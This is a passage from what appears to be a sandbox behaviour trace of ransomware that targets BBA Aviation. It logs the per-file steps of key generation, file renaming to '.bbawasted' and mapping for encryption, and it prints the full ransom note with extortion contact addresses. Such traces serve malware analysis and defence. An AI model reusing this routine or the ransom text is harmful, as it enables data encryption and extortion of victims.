hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0163.481] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.481] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico") returned 46 [0163.481] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x69e318 [0163.481] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.481] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.481] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0163.482] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.482] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.482] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0163.572] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.573] SetEndOfFile (hFile=0x294) returned 1 [0163.677] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.707] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.707] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.707] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.bbawasted")) returned 1 [0163.828] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate3.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate3.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x28c [0163.829] CreateFileMappingW (hFile=0x28c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x27c [0163.829] GetFileSize (in: hFile=0x28c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x37e [0163.829] MapViewOfFile (hFileMappingObject=0x27c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.829] CloseHandle (hObject=0x28c) returned 1 [0163.951] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0163.952] CloseHandle (hObject=0x27c) returned 1 [0163.952] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x6a3670 [0163.952] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x66c898) returned 1 [0163.952] CryptGenRandom (in: hProv=0x66c898, dwLen=0x1b8, pbBuffer=0x6a36b8 | out: pbBuffer=0x6a36b8) returned 1 [0163.952] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.952] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x66c898) returned 1 [0163.953] CryptGenRandom (in: hProv=0x66c898, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0163.953] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0163.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0163.964] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.964] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]F6CfzhgovbS2eY8s1N0OP0ufqpWVxNPV3gPufMq14lBjqTPJ1knzrCtvh+pOzlx6\r\n1DDuQyRPUufiWiYKvtQk7xY3cAERICYEW6/DdwQCsOKMdhlm0jW0tqehTnfk2nDy\r\ntvEUHgYLyqBXR97XL220D+fRqwVREhx/r9JQC5j8Bk1FMlSerA5QPFuyeKlSEQvL\r\nFdplDdeCQhEVT3GqgQr55vzMKtzOOp4fjKujkC/umelaYsbAcphEhBDZjocDeBxK\r\nMkbQbJ5hhwbHkj/au++HDncWBxCVdOO8kgCzBfmSmx8tOiAfYQetMPJmoHoL8cPI\r\nv7/Q7p3MVGV8VUfCX1AiAjRN8i4cjOJq7SI7WfLMum+plkHLoKuEFImICen1FvVz\r\nagnPZMFm/Sj9JYnjgb9OY0yemISiK9Da2TrT8QsiO02TAKts9zC19ip07vwAm/9E\r\nE0OwKNWX/thiOBVVkXIOFI4CU3+6NlDilWtvYx/QmQTE2opmgKQh3PkGhHZHnZ9E\r\nbv+hjtPUAjopsRJx5k2V7i4Axx0eymI+bMoSGCDRIuz1OAolAhe8bB2P7yO8dfCd\r\nx+XNSfnbHY1zd0cLXNJPSVMBhJBEm7CR8+cNx+yuxARnF1eqMFWzty/jjJ9ZvbIk\r\n5B07VMxyRQPZjaBSuPi4b48Vfa8zvvm4MFpIXU+fJkq=[end_key]\r\nKEEP IT\r\n") returned 984 [0163.964] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0163.964] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0163.965] SetEndOfFile (hFile=0x294) returned 1 [0163.967] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.967] CloseHandle (hObject=0x294) returned 1 [0163.969] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0163.970] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3898 | out: hHeap=0x660000) returned 1 [0163.970] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x66c898) returned 1 [0163.970] CryptGenRandom (in: hProv=0x66c898, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0163.970] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.970] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico") returned 46 [0163.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x266) returned 0x69e318 [0163.971] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0163.971] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0163.971] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x66c898) returned 1 [0163.971] CryptGenRandom (in: hProv=0x66c898, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0163.971] CryptReleaseContext (hProv=0x66c898, dwFlags=0x0) returned 1 [0163.971] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0163.972] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0163.973] SetEndOfFile (hFile=0x294) returned 1 [0163.973] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0163.974] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0163.974] lstrcpyW (in: lpString1=0x69e374, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0163.974] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.bbawasted")) returned 1 [0163.975] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Rotate6.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\rotate6.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0163.975] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0163.975] GetFileSize (in: hFile=0x27c, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x37e [0163.975] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x37e) returned 0x640000 [0163.975] CloseHandle (hObject=0x27c) returned 1 [0164.028] UnmapViewOfFile (lpBaseAddress=0x640000) returned 1 [0164.028] CloseHandle (hObject=0x28c) returned 1 [0164.028] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.028] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0164.029] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.029] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.029] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a6bd0) returned 1 [0164.030] CryptGenRandom (in: hProv=0x6a6bd0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0164.030] CryptReleaseContext (hProv=0x6a6bd0, dwFlags=0x0) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) [0164.080] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6a3670 [0164.080] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.080] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.080] _snwprintf (in: _Dest=0x6a0928, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]R1Dvs9ViYDOr/oCrqY1b0NZtoGPrYO1wRipB8DAbIDIDS8GFz8rbnOs0fdLVWRGu\r\nS1TwGYok0D46o9ZsBQwLsAlbiYgip3TlV7I8k5Yc0mJ9Dxi41JNxTXHBFByhgLgQ\r\n1FgjVk30vtdI0QjbxOlp9pidAfMpBgCpTtBcB1NhJ9PXJLjNozl1iUS+ie3VeEvZ\r\nmGTDbF+5lKN4s7NJ6cBsiEzn18adH9iaK2yDXuBBYFtOohO1SE6x5N9aaJ/6RPX5\r\nCkdRtL4+cBKd1e5M/+HUJy/C3yjlV3EJwb7bMrt7oMU5vpXA68fHPJD0Jfj9e88D\r\ngArSPvBpf0nRTFafbar47m6LIJ4Y6yCSv62EdtD5indDLB4YeJxPAWhyUHqRHiVs\r\nr00BBJLQfZANaB/8JxSIGL7BaldrlHxeoy6ReMSJ5twXP0GXM1ENQpDwcWptAiKl\r\nVPKBWCCiatnyf/prD8dQSnbQVURx5CNjiEFGZuC1vzWzRTKH2iSxLjuNbOAswm4G\r\n5dCE0n1V+baIaz8l7sqU8dE1EW4TKFjjzlVlLqMy6/jcDWdeRASeAQXNRk7Ghqob\r\naiBHE++AXi3uL8cvVBmmVgfcZOae57XJyrEy9sJRGH+Ss8sL/cwj2IyYIF3WQpgp\r\n/6PxRoyMDO5StQnVI/leQE0yWi8oLdbBiCpZH1096hU=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.080] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3670 | out: hHeap=0x660000) returned 1 [0164.081] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0164.081] SetEndOfFile (hFile=0x294) returned 1 [0164.084] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.084] CloseHandle (hObject=0x294) returned 1 [0164.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0164.088] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3ac0 | out: hHeap=0x660000) returned 1 [0164.088] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6ce0) returned 1 [0164.089] CryptGenRandom (in: hProv=0x6a6ce0, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0164.089] CryptReleaseContext (hProv=0x6a6ce0, dwFlags=0x0) returned 1 [0164.089] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico") returned 44 [0164.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x262) returned 0x69e318 [0164.089] lstrcpyW (in: lpString1=0x69e370, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.089] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6a0928 [0164.089] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6240) returned 1 [0164.090] CryptGenRandom (in: hProv=0x6a6240, dwLen=0xa3a, pbBuffer=0x6a0928 | out: pbBuffer=0x6a0928) returned 1 [0164.090] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.090] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0164.091] WriteFile (in: hFile=0x294, lpBuffer=0x6a0928*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6a0928*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.092] SetEndOfFile (hFile=0x294) returned 1 [0164.092] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.092] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a0928 | out: hHeap=0x660000) returned 1 [0164.092] lstrcpyW (in: lpString1=0x69e370, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.092] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.bbawasted")) returned 1 [0164.095] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\Setup.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\setup.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x290 [0164.096] CreateFileMappingW (hFile=0x290, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x280 [0164.096] GetFileSize (in: hFile=0x290, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x8f66 [0164.096] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x8f66) returned 0x650000 [0164.096] CloseHandle (hObject=0x290) returned 1 [0164.105] UnmapViewOfFile (lpBaseAddress=0x650000) returned 1 [0164.106] CloseHandle (hObject=0x280) returned 1 [0164.106] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x689df0 [0164.106] CryptAcquireContextW (in: phProv=0x12ffdbc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffdbc*=0x6a6240) returned 1 [0164.107] CryptGenRandom (in: hProv=0x6a6240, dwLen=0x1b8, pbBuffer=0x689e38 | out: pbBuffer=0x689e38) returned 1 [0164.107] CryptReleaseContext (hProv=0x6a6240, dwFlags=0x0) returned 1 [0164.107] CryptAcquireContextW (in: phProv=0x12ffb24, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffb24*=0x6a69b0) returned 1 [0164.107] CryptGenRandom (in: hProv=0x6a69b0, dwLen=0x200, pbBuffer=0x12ffb40 | out: pbBuffer=0x12ffb40) returned 1 [0164.107] CryptReleaseContext (hProv=0x6a69b0, dwFlags=0x0) returned 1 [0164.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x403) returned 0x6be308 [0164.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x689df0 | out: hHeap=0x660000) returned 1 [0164.185] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.185] _snwprintf (in: _Dest=0x6bb6f0, _Count=0x51d, _Format="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="BBA Aviation\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 91645@PROTONMAIL.CH | 61258@ECLIPSO.CH TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]dP5yGYAOWSeORj+s1teKMW659fEaz/qQsr4QRAkHCU95bSOqvDWk68i+qLSRJztp\r\nWFKSXqES1Mo0xo/vpPF2AWDH8BHrW2JIsF9fCFRRRjTB90pRdyM7o9C3jzCmtPe5\r\nrZC7+e7zeYHdIn/cmo9iuOuoS1Ffa0zj5AsZdNjwZNAAuTYKTBvzOyHlgkVqSl8P\r\nFT6OceK7FIZsJOtKxWOwsFN9qYv+B8a0Xc4T3LBRwtbdekC/yGMsLjY4r8Ig3lKZ\r\n6gzeZockqaPmC45SRiXaao9n/k2DWIOAV8ePUf7Zfh8hBFtZsWXpx20dEOpgWKcA\r\n9TcutsOgyeL4vfTxfBdbigjug77M7WGY8kV4ZpuLoJCjFqR1TxyawXfudnkwwj4M\r\nC7+ly55xSPhu/D9iwEjJpEGfCfLMKBXLxqom1oozfbA/nNcw8cw+4UDvyu4cSMzi\r\nuG94I/K73NSvjMa1qhpN7dOVaw/XKZWlxGzm0oOZrmCnLuKJnbtvbtojQZgjZznA\r\nuqWOTp7MLkO8HX3OiRU0yyC3nOme7cSruPdiBz3/L3Dckh2OKCbg9Kvvgg6xakYa\r\n/I3sL4f8kC4Y1nuyWpZ3OBiVoMwk2W/B1WTWOx5KDcg7lx0TKYxu1lhofmYzyzcq\r\nZV3KmDxxC9rzHCRkabG2uy+44Efor8vpNBTzFdKpYRu=[end_key]\r\nKEEP IT\r\n") returned 984 [0164.185] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6be308 | out: hHeap=0x660000) returned 1 [0164.185] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0x7b0, lpNumberOfBytesWritten=0x12ffe30, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffe30*=0x7b0, lpOverlapped=0x0) returned 1 [0164.186] SetEndOfFile (hFile=0x294) returned 1 [0164.188] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.188] CloseHandle (hObject=0x294) returned 1 [0164.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x69e318 | out: hHeap=0x660000) returned 1 [0164.190] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6a3ce8 | out: hHeap=0x660000) returned 1 [0164.190] CryptAcquireContextW (in: phProv=0x12ffe04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffe04*=0x6a6460) returned 1 [0164.211] CryptGenRandom (in: hProv=0x6a6460, dwLen=0x48, pbBuffer=0x12ffe40 | out: pbBuffer=0x12ffe40) returned 1 [0164.211] CryptReleaseContext (hProv=0x6a6460, dwFlags=0x0) returned 1 [0164.211] lstrlenW (lpString="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico") returned 48 [0164.211] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x26a) returned 0x69e318 [0164.212] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0164.212] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa3a) returned 0x6bb6f0 [0164.212] CryptAcquireContextW (in: phProv=0x12ffde0, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x12ffde0*=0x6a6570) returned 1 [0164.213] CryptGenRandom (in: hProv=0x6a6570, dwLen=0xa3a, pbBuffer=0x6bb6f0 | out: pbBuffer=0x6bb6f0) returned 1 [0164.213] CryptReleaseContext (hProv=0x6a6570, dwFlags=0x0) returned 1 [0164.213] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.bbawasted_info" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0164.214] WriteFile (in: hFile=0x294, lpBuffer=0x6bb6f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0x12ffdfc, lpOverlapped=0x0 | out: lpBuffer=0x6bb6f0*, lpNumberOfBytesWritten=0x12ffdfc*=0xa3a, lpOverlapped=0x0) returned 1 [0164.216] SetEndOfFile (hFile=0x294) returned 1 [0164.216] SetFilePointer (in: hFile=0x294, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0164.216] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6bb6f0 | out: hHeap=0x660000) returned 1 [0164.216] lstrcpyW (in: lpString1=0x69e378, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0164.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico"), lpNewFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.bbawasted")) returned 1 [0164.217] CreateFileW (lpFileName="\\\\?\\C:\\588bce7c90097ed212\\Graphics\\SysReqMet.ico.bbawasted" (normalized: "c:\\588bce7c90097ed212\\graphics\\sysreqmet.ico.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x288 [0164.218] CreateFileMappingW (hFile=0x288, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x28c [0164.218] GetFileSize (in: hFile=0x288, lpFileSizeHigh=0x12ffdcc | out: lpFileSizeHigh=0x12ffdcc*=0x0) returned 0x47e [0164.218] MapViewOfFile (hFileMappingObject=0x28c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, 